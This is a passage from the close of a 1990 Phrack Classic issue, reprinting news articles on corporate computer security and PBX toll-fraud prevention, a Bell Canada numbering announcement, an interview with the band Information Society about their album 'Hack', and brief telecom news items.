  6853. people, who are in high demand, might leave for other jobs if security becomes
  6854. too cumbersome.
  6855.  
  6856. Expense is another factor.  Serious security measures at a large installation
  6857. can cost an average of $100,000, though a smaller company can be helped for
  6858. about $10,000, said Trevor Gee, partner at consulting company Deloitte and
  6859. Touche.
  6860.  
  6861. "They hear all the rumors, but unless you illustrate very specific savings,
  6862. they are reluctant," Gee said.
  6863.  
  6864. Proving cost savings is difficult unless the company already has been hit by
  6865. computer crime.  But those victims, some of whom have suffered losses in the
  6866. millions, are usually security experts' best customers, consultants say.
  6867.  
  6868. Much of the vulnerability to computer crime comes simply from lax security.
  6869. Access is not restricted.  Doors are not locked.  Passwords are easily guessed,
  6870. seldom changed and shared with several workers.  And even these basic security
  6871. measures are easy to put off.
  6872.  
  6873. "You hear a lot of, `We haven't gotten around to changing the password because.
  6874. .  .," Roy Alzua, telecommunications security program manager at Rockwell
  6875. International, told the security conference.
  6876.  
  6877. So what should companies do to plug the gaping security holes in their
  6878. organizations?
  6879.  
  6880. Consultants say that top management first has to make a commitment that
  6881. everyone in the operation takes seriously.
  6882.  
  6883. "I've seen companies waste several hundreds, if not thousands, of dollars
  6884. because management was not behind the program," Deloitte & Touche's Gee said.
  6885. "As a result, MIS (management information systems) professionals have a tough
  6886. time" pressing for more security.
  6887.  
  6888. Once top executives are convinced that there is a need for tighter security,
  6889. they must establish policies and procedures, consultants say.  Gee suggests
  6890. that in addition to training programs, reminders should be posted.  Such issues
  6891. as whether employees are allowed to use computers for personal projects should
  6892. be tackled.
  6893.  
  6894. Management also should decide what systems and information need to be secured.
  6895.  
  6896. "They need to zero in on the information they are really concerned about," said
  6897. Gregory Therkalsen, national director of information security services for
  6898. consultants Ernst & Young.  "About 95 percent of the information in the average
  6899. company nobody cares about."
  6900.  
  6901. Before tackling complicated security systems, companies should pay attention to
  6902. the basics.
  6903.  
  6904. "Lock a door.  It's as easy as that," Alzua said.
  6905.  
  6906. Companies should make sure that the passwords that come with their computers
  6907. are changed.  And then employees should not use common words or names that are
  6908. easy to guess.  Using a combination of numbers and letters, although difficult
  6909. to remember, is more secure.
  6910.  
  6911. Another basic measure is to have a system that automatically checks the
  6912. authorization of someone who dials into the company's computers from the
  6913. outside.
  6914.  
  6915. Then, companies should develop an electronic audit trail so that they know who
  6916. is using the system and when.  And companies should always take the time to
  6917. make backups of their computer files and store them in a place safe from fire
  6918. and flood.
  6919.  
  6920. A wide variety of software is available to help companies protect themselves.
  6921. Some automatically encode information entered into the system.  Others detect
  6922. viruses.
  6923.  
  6924. For a more sophisticated approach, LeeMah Datacom has a system that blocks a
  6925. computer tone from the telephone line until the correct access code is entered.
  6926. The company has held contests challenging hackers to break into its system.  No
  6927. one has, the company said.
  6928.  
  6929. SRI is developing a system that would monitor computer activity around the
  6930. clock with the supervision of a security guard.  SRI is implementing the system
  6931. for the FBI and plans to make it a commercial product.
  6932.  
  6933. No company would want to have a perfectly secure system, consultants say.  That
  6934. would mean shutting out most employees and staying off networks that can make
  6935. operations more efficient.
  6936.  
  6937. While still balancing the need for openess, however, there is much that can be
  6938. done to prevent computer crime.  And although there is no perfect solution,
  6939. companies don't need to stand by waiting to become the next victim.
  6940.  
  6941. _______________________________________________________________________________
  6942.  
  6943.  
  6944. HEADLINE  BELL CANADA'S NEW LOOK TELEPHONE NUMBERS PUZZLE SOME CUSTOMERS
  6945. DATE      09/26/90
  6946. SOURCE    CANADA NEWS-WIRE   (CNW)
  6947.           Contact:  For further information, contact: Irene Colella (416)
  6948.           581-4266; Geoff Matthews, Bell Canada (416) 581-4205. CO: Bell Canada
  6949.           SS: IN: TLS
  6950.           Origin:   TORONTO
  6951.           Language: ENGLISH; E
  6952.           Day of Week: Wed
  6953.           Time:        09:56 (Eastern Time)
  6954.           (Copyright Canada News-Wire)
  6955. RE        CN
  6956.           ---    BELL CANADA'S NEW LOOK TELEPHONE NUMBERS PUZZLE SOME
  6957.                                     CUSTOMERS                            ---
  6958.  
  6959. TORONTO - Bell Canada's new look telephone numbers in Southern Ontario are
  6960. causing puzzlement among some customers in the 416 area code.
  6961.  
  6962. In late 1988 Bell found itself running short of telephone numbers in the Golden
  6963. Horseshoe because of rapid business and residential growth as well as the
  6964. increasing popularity of cellular telephones, fax machines and new services
  6965. like Ident-A-Call.
  6966.  
  6967. To accommodate continuing growth, the company had to come up with a means of
  6968. creating new number combinations.  The solution was found by assigning local
  6969. exchanges made up of combinations which had previously been reserved as area
  6970. codes elsewhere in North America.
  6971.  
  6972. Until March of this year the three numbers (known as a central office code)
  6973. which begin a telephone number never had a zero or a one as the second digit.
  6974. Anything from two through nine could appear in that position, but combinations
  6975. with zero or one were used only as area codes.  But with more than four million
  6976. telephone numbers in use throughout the Golden Horseshoe Bell was simply
  6977. running out of the traditional central office code combinations.  By creating
  6978. new central office codes such as 502, 513, 602 and 612, the company has access
  6979. to up to one million new telephone numbers.
  6980.  
  6981. Some customers, however, have found the new numbers a little confusing.  When
  6982. the new numbers were introduced last March, Bell mounted an extensive
  6983. advertising campaign telling customers throughout the 416 area code to dial 1
  6984. plus 416 or 0 plus 416 for all long distance calls within the area code in
  6985. order to ensure calls to these numbers could be completed.
  6986.  
  6987. Bell spokesman Geoff Matthews says that while the ad campaign was extremely
  6988. effective in changing dialing habits, a number of customers are scratching
  6989. their heads when they first see the new telephone numbers.
  6990.  
  6991. ``In some cases we are finding that business customers have not programmed
  6992. their telephone equipment to permit dialing the new numbers,'' Matthews said,
  6993. ``but some people think it is simply a mistake when they see a telephone number
  6994. beginning with 612 for example.  Most are satisfied once they have received an
  6995. explanation.''
  6996.  
  6997. Creating the million new telephone numbers should see Bell Canada through
  6998. several years, Matthews said, after which a new area code will be introduced.
  6999.  
  7000. The 416 area code is the first in Canada to reach capacity.  A number of U.S.
  7001. cities have faced a similar situation, Matthews said, and have introduced
  7002. similar number plans.
  7003.  
  7004. Bell Canada, the largest Canadian telecommunications operating company, markets
  7005. a full range of state-of-the-art products and services more than seven million
  7006. business and residence customers in Ontario, Quebec and part of the Northwest
  7007. Territories.
  7008.  
  7009. Bell Canada is a member of Telecom Canada -- an association of Canada's major
  7010. telecommunications companies.
  7011.  
  7012.  
  7013. For further information, contact:  Irene Colella (416) 581-4266; Geoff
  7014. Matthews, Bell Canada (416) 581-4205.
  7015.  
  7016. _______________________________________________________________________________
  7017.  
  7018.  
  7019. HEADLINE  Keeping The PBX Secure
  7020.           Byline:   Bruce Caldwell
  7021. DATE      10/15/90
  7022.           Issue:    291
  7023.           Section:  TRENDS
  7024.           Page:     25
  7025.           (Copyright 1990 CMP Publications, Inc.  All rights reserved.)
  7026.  
  7027. Preventing toll fraud through the corporate PBX can be as simple, albeit
  7028. inconvenient, as expanding access codes from four digits to 14.  "When we had
  7029. nine-digit codes, we got hurt bad," says Bob Fox of US Sprint Communications
  7030. Co., referring to the phone company's credit card numbers.  "But when we moved
  7031. to 14-digit codes and vigorous prosecution, our abuse dropped off the table."
  7032.  
  7033. At most companies, the authorization code for remote access, used by employees
  7034. to place calls through the corporate PBX while away from the office, is only
  7035. four digits.  Many companies are "hung up on the four-digit authorization
  7036. code," says Fox, mainly because it's easier for the executives to remember.
  7037. But all it takes a hacker to crack open a four-digit code is about 20 minutes.
  7038.  
  7039. To help their customers cope with PBX abuse, MCI Communications Corp.  has
  7040. prepared a tip sheet describing preventative measures (see accompanying chart).
  7041. PBX fraud may display itself in a particular pattern:  The initial stage will
  7042. show a dramatic increase in 950-outbound and 800-outbound services, which allow
  7043. a surreptitious user to "cover his tracks" by jumping from one carrier to
  7044. another-a technique known as "looping." In time, knowledge of the unsecured
  7045. system may become widespread, resulting in heavy use of services connected with
  7046. normal telecommunications traffic.
  7047.  
  7048. Customers are advised to audit systems for unusual usage and to change codes on
  7049. a regular basis.  Steady tones used as prompts to input access codes should be
  7050. avoided, because that is what hacker-programmed computers look for.  Instead,
  7051. MCI advises use of a voice recording or no prompt at all, and recommends
  7052. automatic termination of a call or routing it to a switchboard operator
  7053. whenever an invalid code is entered.
  7054.  
  7055. An obvious source of help is often overlooked.  Explains Jim Snyder, an
  7056. attorney in MCI's office of corporate systems integrity, "The first thing we
  7057. tell customers is to contact their PBX vendor to find out what kind of
  7058. safeguards can be built into the PBX."
  7059.  
  7060. _______________________________________________________________________________
  7061.  
  7062.  
  7063. HEADLINE  WATCH YOUR PBX
  7064.           Column:   Database
  7065. DATE      04/02/90
  7066. SOURCE    COMMUNICATIONSWEEK   (CWK)
  7067.           Issue:    294
  7068.           Section:  PRN
  7069.           Page:     24
  7070.           (Copyright 1990 CMP Publications, Inc.  All rights reserved.)
  7071.  
  7072. Many managers of voice systems would be "horrified" if they realized the low
  7073. levels of security found in their PBXs, according to Gail Thackeray, an
  7074. assistant attorney general for the state of Arizona.  Thackeray made her
  7075. comments to a group of financial users at a computer virus clinic held by the
  7076. Data Processing Management Association's Financial Industries chapter.
  7077. Thackeray, who investigates computer crimes, said that PBXs often are used by
  7078. network criminals to make free long distance phone calls at the expense of the
  7079. companies that own the PBXs.  "PBX owners are often unaware that if $500,000
  7080. worth of fraud comes from your PBX, the local carrier is not going to absorb
  7081. that loss," she said.
  7082.  
  7083. The PBX also is often the first source of break-in by computer hackers, who use
  7084. the free phone service to get into a user's data system, she said.  "PBXs are
  7085. the prime method for international toll fraud and hackers attacking and hiding
  7086. behind your corporate identity," Thackeray said.
  7087.  
  7088. Richard Lefkon, Citicorp's network planner and president of DPMA's financial
  7089. industries chapter, said users are more likely to take steps toward protecting
  7090. a PBX than a network of microcomputers.  "A PBX is expensive, so if you add 15
  7091. to 20 percent to protect it, it's a justifiable expenditure," Lefkon said.  "If
  7092. you have a PC which costs a couple of thousand dollars, unless you think you're
  7093. special, you are going to think twice before investing several hundred dollars
  7094. per PC to protect them."
  7095.  
  7096. _______________________________________________________________________________
  7097.  
  7098.  
  7099.                         KL ^*^ KL ^*^ KL ^*^ KL ^*^ KL
  7100.  
  7101.                               K N I G H T L I N E
  7102.  
  7103.                            Issue 03/Part III of III
  7104.  
  7105.                             17th of November, 1990
  7106.  
  7107.                               Written, compiled,
  7108.  
  7109.                            and edited by Doc Holiday
  7110.  
  7111.                         KL ^*^ KL ^*^ KL ^*^ KL ^*^ KL
  7112.  
  7113.                                       ---
  7114.  
  7115.      What is this?  Information Society's new album is called "HACK"?  Just
  7116. what do these guys know about hacking?  How did they come up with the album
  7117. title?  Why are they taking such an interest in the Computer Underground?
  7118.  
  7119.      Knightline got the chance to ask Kurt Valaquen of InSoc about the new
  7120. album and his involvement with the CU.
  7121.  
  7122. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  7123.  
  7124. RINGing New York .. .
  7125.  
  7126. KV: Hello
  7127. Me: Kurt?
  7128. KV: Yes, Doc ?
  7129. Me: Yea, you ready for the interview?
  7130. KV: Sure, shoot.
  7131. Me: Okay, this is DH with Phrack Classic--
  7132. TC: This is the Conflict
  7133. PH: And this is Pain Hertz
  7134. KV: I uh, hope you ask me what my hacker handle is..
  7135. Me: Ok, what's your handle?
  7136. KV: Because I believe that I have one of the coolest hacker's handles that I've
  7137.     ever heard.
  7138. TC: uhh
  7139. Me: What is it?
  7140. KV: TRAPPED VECTOR.
  7141. Me: "Trapped Vector" ?
  7142. KV: yep
  7143. Me: How did you come up with that?
  7144. KV: What? You don't recognize it ?
  7145. Me: haha
  7146. KV: What.. . and you guys call yourselves hackers?
  7147. Me: ah
  7148. KV: My god. . you guys must be so young that you've never had to deal with
  7149.     assembly language.
  7150. Me: Who would want to-- It was a sarcastic question..
  7151. Me: Now, Kurt..
  7152. KV: Trapped Vector is a term from deep deep down in the functioning's of a CPU.
  7153. Me: Right.
  7154. Me: Uh, uh What kind of involvement, if any, have you had in the
  7155.     telecommunications field?
  7156. KV: In telecommunications what?
  7157. Me: In the telecommunications field.
  7158. KV: Uhh.. I majored in computer science at the University of Minnesota.. . Just
  7159.     long enough to get interested and not long enough to get a degree.
  7160. Me: ah. So you didn't graduate?
  7161. KV: No. After my 5th year I finally gave up and went to Vienna.
  7162. Me: Uhh. Let's get into the new album .. uh now, what was the inspiration for
  7163.     involving the "hacking" theme in your new album?
  7164. KV: Umm, well, it's not like we were inspired to do it -- and we sat around all
  7165.     day and said "Hey, let's like put this hacker's moltese into it." -- it's
  7166.     more like we just left all that stuff out on our first album because we
  7167.     were trying to .. uh.. to not make any waves, since it was our first album.
  7168.     And now were cocky and think we can do whatever we want.  So we just did
  7169.     whatever we wanted. And whenever we do whatever we want, some of that
  7170.     stuff inevitably creeps in because .. were into it.
  7171. Me: uhh.. have you been following all of the recent hacking busts that have
  7172.     plagued the country this year .. ?
  7173. KV: Hacking "buzz" that has plaged.. .
  7174. Me: BUSTS.. yea hacking busts..
  7175. KV: Oh, I haven't been following it, but I've been hearing a little bit about
  7176.     it from my friends..
  7177. Me: Yea, because your album comming out titled "HACK" really does tie in
  7178.     with this time period of hackers getting alot of press..
  7179. KV: Yea
  7180. Me: And I just thought that could have been one of the inspirations.. .
  7181. KV: Well, actually, believe it or not, we don't really know what it means to
  7182.     title an album "HACK".  We have a list of about nine different
  7183.     interpretations that we thought we could leave open and anyone else could
  7184.     decide which is the real one and strangley (Gruhm) the computer hacker
  7185.     concept is pretty far down on our list.  The first one we always think of
  7186.     is uh.. the hack versus .. uh.. respected professional-- meaning-- like,
  7187.     you know, their just hack, he's just a hack writer.. .
  7188. Me: Right.
  7189. KV: Their just hack musicians-- because uh, I guess we wanted to be
  7190.     self-deprecating in a sarcastic and easily marketable way.
  7191. Me: Yea..
  7192. Me: What about your personal involvement in the Computer Underground? Is there
  7193.     one? With hackers?
  7194. KV: Well, umm.. if I were not being a "pop tart" (which is our personal lingo
  7195.     for rock star) I would probably be trying to make my money off of
  7196.     programming.
  7197. Me: Aaah!
  7198. KV: Ummm, however.. that's not the case.. I am trying to be a "pop tart" so my
  7199.     involvement is more limited that I would like it to be.  I mean I do all my
  7200.     work on IBM.. When I'm composing..
  7201. Me: Hm, Kurt, what are your thoughts and attitudes toward hackers and hacking?
  7202. KV: Umm,  this is my thoughts and attitudes towards it:  I am somebody who --
  7203.     always. . always -- like when I had that telephone job, I just was, I
  7204.     hardly did any work.  I just spent the whole time trying to come up with
  7205.     tricky things to do you know.  Like I'd screw up other people's phone calls
  7206.     and stuff and so like I'm way into it.  And I understand why people want to
  7207.     do it.  BUT, I always kinda, knew that I just .. . shouldn't.  Just because
  7208.     it's stupid.. It was childish.  And, I just wish that hackers could come up
  7209.     with something better to do than get things without paying for them.
  7210. PH: Like something more productive?
  7211. KV: Yea, like .. uh.. umm, crash some sort of umm, killing organization's
  7212.     computer system.
  7213. Me: Have you always had these thoughts or..just because of your popularity?
  7214. KV: Umm, I've had this attitude as I got older, because .. um, I'm just
  7215.     becomming really bored with people devoting all this intelligence and
  7216.     motivation into like avoiding paying their phone bill.
  7217. TC: Well, actually, that's getting away from the hacker as such. Because alot
  7218.     of hackers are really into systems more than their into .. you know, toll
  7219.     fraud.
  7220. KV: Well I sure hope so..
  7221. TC: Yea, I mean..
  7222. KV: My Idea of great hacking is gathering information that other people are
  7223.     wronmgfully trying to withhold.
  7224. TC: Right.
  7225. KV: But, most hacking to me seems to be petty ways of getting things without
  7226.     paying for them.. and that is just silly.
  7227. Me: That is the "90's hackers" Kurt.
  7228. PH: Yea, it's moving that way alot..
  7229. Me: It's in that direction.
  7230. Me: Tell us about the telephone job you mentioned?
  7231. KV: Well, I worked at a market research place.  You all know what that is-- you
  7232.     call up and say, "Hello, my name is Kurt and Im calling for marketing
  7233.     incentives incorporated, and we are conducting a survey in your area
  7234.     tonight... about toothpaste!"
  7235. PH: Hah
  7236. TC: ahha
  7237. Me: Bahaha
  7238. KV: "And I would like to know if I could ask you a few questions?" .. "What! I
  7239.     don't wanna buy no toothpaste!" .. "No we were just going to ask a few
  7240.     questions.." -- Ewwwwph..
  7241. KV: Like... you would try to come up with ways to not make the phone calls
  7242.     because it was so painful to do.
  7243. TC: heh
  7244. KV: The best thing was when I umm. . this was a time when I didn't know much
  7245.     about telephones.. or how they really worked.. umm. . but I managed to run
  7246.     a little thing-- wires with alligator clips --uhh, from the phone that I
  7247.     was at to the central switcher.  And uhh, whenever I like got up to goto
  7248.     the bathroom, or something, I'd go in there, and by connecting and shorting
  7249.     the two wires out I'd break up someone's phone call.
  7250. PH: ha
  7251. KV: You know, but after a while, I thought to myself, WHY? I wish I could have
  7252.     pulled something more creative like umm.. . installing a uhh.. a pitch
  7253.     transposer on the outgoing signals, so that the people on the other end of
  7254.     the phone would hear, "AND NOW, I WOULD LIKE TO ASK YOU: HOW DO YOU FEEL
  7255.     ABOUT COLEGATE?"
  7256. Me: Bahaha
  7257. TC: ahha
  7258. PH: heh!
  7259. KV: That would have been funny-- aha.
  7260. KV: But, I never did that..
  7261. Me: Hmm, Do you know any other bands that are involved or interested in the
  7262.     computer underground?
  7263. KV: No, I don't know that there are any-- most uh musicians are either
  7264.     anti-tech or if they are into tech they arnt into it enough-- or they arn't
  7265.     into it for it's own sake.  Like, like hackers.
  7266. Me: Did you guys have any problems with the title of your new album?
  7267. KV: Like what do you mean?
  7268. Me: Well, do you find that most of your fans think you guys are into the
  7269.     "hacking scene" because of the title?
  7270. KV: They can think of it anyway they want-- it a bunch of different meanings.
  7271. KV: Like uh, one member of the band thinks of it refering to him being a cook
  7272.     and he likes to cut up meat.
  7273. Me: Hah
  7274. TC: heh
  7275. TC: What about like on the 12" with the "BlueBox 2600" mix and the
  7276.     "Phone Phreakers" mix?
  7277. KV: What about it?
  7278. TC: Yea.. uh
  7279. KV: And the Virtual Reality mix?
  7280. TC: Yea, has that uh.. have you heard anything about that?
  7281. KV: Umm, no people in large just don't notice.  I mean when your a hacker, I
  7282.     mean you kind of forget how little people know.  But it's unbelieveable how
  7283.     much people don't know.  And I'm sure one person in a thousand thinks that
  7284.     those are anything other than, "Oh another wacky mix name!"
  7285. Me: Baha
  7286. KV: Most mix names are just inside jokes-- so most people don't bother trying
  7287.     to understand them.
  7288. TC: Right.
  7289. KV: Umm, basically the only thing that has happened is that people have umm..
  7290.     really responded to the concept of uhh.. us trying to tie into computer
  7291.     hacking-- way more than we were really trying to.  We just wanted it to be
  7292.     a reference.  And the people around us are kinda pushing us into it being a
  7293.     theme.  Were not really prepared for that.  Because, while were into it, of
  7294.     the three of us, Im the only one who can hold down a conversation about
  7295.     tech.  And even I have to move over and admit that I am not ane expert
  7296.     hacker.  I just dont know enough.  Like.. Uh.. I know what an FAT is, but
  7297.     I wouldn't know how to rewrite it.
  7298. TC: Well, that's another thing.  Do you make a distinction between hacker as
  7299.     someone who breaks into computers or a hacker who is an intense system
  7300.     programmer?
  7301. KV: Do I make that distinction?
  7302. TC: Yea.
  7303. KV: Umm.. No.. Im not involved enough in the hacker world to make that
  7304.     distinction.
  7305. Me: Do you have anything you want to say to the computer underground?
  7306. KV: Umm.. .yes let me think. . "Roller-skating is not a crime".
  7307. TC: Hah
  7308. PH: ah!
  7309. KV: You know that I live on skates don't you?
  7310. PH: Well on the album cover your wearing skates.. next to that car ... with
  7311.     your..
  7312. KV: My teledestruction gear!
  7313. KV: And, I have to add a grain of salt to the phrase "Hackers of the world
  7314.     unite" thats on our album cover..
  7315. PH: Right.
  7316. KV: We didn't actually intend it to be a huge banner.. it was suppose to be a
  7317.     tiny little comment on the side.. and our label misunderstood our
  7318.     intentions for that.  We didn't think it was quite good enough to have it
  7319.     be a huge .. in such huge print.
  7320. Me: Hmm
  7321. KV: Not a grain of salt.. A tounge and a cheek.
  7322. TC: hehe
  7323. <SILENCE>
  7324. Me: Well, I guess thats about it.. Do you have anything you wanna sum up with?
  7325. KV: Umm..
  7326. <SILENCE>
  7327. Me: Uh, Kurt, do you have an Email address somewhere?
  7328. KV: AH, well, Im embarrassed to say it but only on Prodigy.
  7329. TC: HAH
  7330. Me: Bahah!
  7331. PH: Heh
  7332. Me: Okay.. Well, if that's it..
  7333. KV: Wait.  I do know something I can sum up with..
  7334. KV: Please.. In the case of our album try to overcome your instinct of hacker
  7335.     tendancies and buy an original disk rather than just waiting for a copy..
  7336. KV: Ok?
  7337. Me: Hah
  7338. KV: We need the money.
  7339.  
  7340. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  7341.  
  7342. [The following is a press release for InSoc's new LP. --DH]
  7343.  
  7344.                                  INFORMATION
  7345.                                    SOCIETY
  7346.  
  7347.  
  7348. "Hackers have no regard for conventional wisdom.  We have no regard for
  7349. musical conventions..."
  7350.  
  7351.                                 --  Paul Robb
  7352.  
  7353.  
  7354. "Hack has multiple meanings, some of them self-deprecating.  You can't
  7355. take any of this too seriously or you've missed the point.  It's about
  7356. a playful use of technology, about breaking codes.  It's a post-modern
  7357. aesthetic that comes through in our music..."
  7358.  
  7359.                                 --  James Cassidy
  7360.  
  7361.  
  7362. "After having devised, erased and blotted out many other names, we
  7363. finally decided to call our album _Hack_  --  a name that, in our
  7364. opinion, is lofty, sonorous and significant.  It explains that we had
  7365. been only ordinary hacks before we had been raised to our present status
  7366. as first of all hacks in the world..."
  7367.  
  7368.                                 --  Kurt Valaquen
  7369.  
  7370.  
  7371. There you have it...as complete a definition of the vision of _Hack_ as
  7372. you're likely to get short of actually listening to Information
  7373. Society's superb new album of the same name.  And if, after reading the
  7374. trio's treatises on the term, you suddenly have a clear understanding of
  7375. what the meaning behind _Hack_ really is, then something's gone wrong.
  7376. _Hack_ is more than the definition.  It's a way of life.  With its own
  7377. soundtrack.
  7378.  
  7379. "We're musical hackers of the first order," continues InSoc's Paul Robb.
  7380. "What we do is similiar to computer hackers breaking into sophisticated
  7381. systems to wreak havoc."
  7382.  
  7383. "Our music is really different from other progressive styles," adds
  7384. James Cassidy.  "It's funnier and scarier...a mix of pure pop and sub-
  7385. versive stuff underneath the surface."
  7386.  
  7387. TOMMY BOY MUSIC, INC.    1747 1ST AV. NY, NY 10128       (212) 722-2211
  7388.  
  7389. _______________________________________________________________________________
  7390.  
  7391.                               N E W S * B O L T S
  7392.  
  7393.                                     {A - G}
  7394. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  7395. A>      Four direct telephone circuits linking Seoul to Moscow were set to open
  7396. at midnight last night.  South Korea's Communication Ministry said telephone
  7397. calls between South Korea and the Soviet Union have jumped from four calls in
  7398. all of 1987 to some 5,000 a month this year.
  7399. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  7400. B>      In the latest issue of IEEE Spectrum (November, 1990), on pages
  7401. 117-119, there's an interesting article entitled "The Great Blue Box Phone
  7402. Frauds", subtitled "Until the phone company separated signaling information
  7403. from the voice signal, long-distance calls could be made without charge by
  7404. anyone who could whistle at 2600 hertz."
  7405.  
  7406. It even has the illustration from the June 1972 "Ramparts" magazine, showing
  7407. how to constuct a "black box" to prevent the calling party from being billed
  7408. for the call.
  7409.  
  7410. There's also a list of about five or six other references at the end
  7411. of the article which sound interesting.
  7412. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  7413. C>      Registering for AT&T Mail on-line:  make a modem call to 1 800 624 5123
  7414. (2400, 1200, or 300 baud, 8 bit, no parity); give one (or more) <CR>'s; and at
  7415. the login prompt, type REGISTER followed by another <CR>.  The system will walk
  7416. you through its on-line registration procedure.  Have a creditcard number or
  7417. EFT number handy.  You can back out at any time with a ^C (<cntrl>-C) and a
  7418. QUIT.
  7419.  
  7420. A couple further AT&T Mail features:
  7421.  
  7422. "Mail Talk" permits retrieval of messages w/o a terminal from any DTMF phone --
  7423. text messages get "spoken" by a synthesized voice; and there are "Autoanswer"
  7424. and "Autoresponse" options permitting fairly flexible automatic response to
  7425. either all or selected incoming messages.
  7426. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  7427. D>      Detroit, Michigan time 313-472-1212.  May soon be replaced with
  7428. a 900 number that charges.
  7429. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  7430. E>      In Australia, the hacker known as Phoenix was charged with Defrauding
  7431. the Commonwealth, Conspiracy to Commit Treason, and Conspiracy to Commit
  7432. Murder.  The United States has sent representatives from the Federal Bureau of
  7433. Investigation (FBI) and the Computer Emergency Response Team (CERT) overseas to
  7434. help investigate the situation and aid in prosecution of Phoenix.  In the
  7435. meantime, the "eccentric" Phoenix is maintaining ties to hacker friends in the
  7436. USA by use of the Internet.
  7437. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  7438. F>      Bellcore reports that we have only 9 unused area codes.  The current
  7439. system of generating the codes was supposed to last 100-200 years.  Not to
  7440. worry, a representative at the Bell organization says a new plan is already in
  7441. the works.  The new system consists of replacing the 2nd digit (either 0 or 1)
  7442. with a number between 2 and 9.  Bellcore says the new plan should last 200 more
  7443. years. Hm.
  7444. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  7445. G>      A new BBS has been set up for a communication flow between hackers,
  7446. fed, and journalists.  713.242.6853  Instant validation for all.  The BBS is
  7447. called FACE to FACE.
  7448. _______________________________________________________________________________
  7449.  
  7450. *** END OF PHRACK CLASSIC 32; Email: pc@well.ca.sf.us
  7451. -------------------------------------------------------------------------------
  7452.  
  7453.  
  7454.  
  7455. </pre>
  7456. </body>
  7457.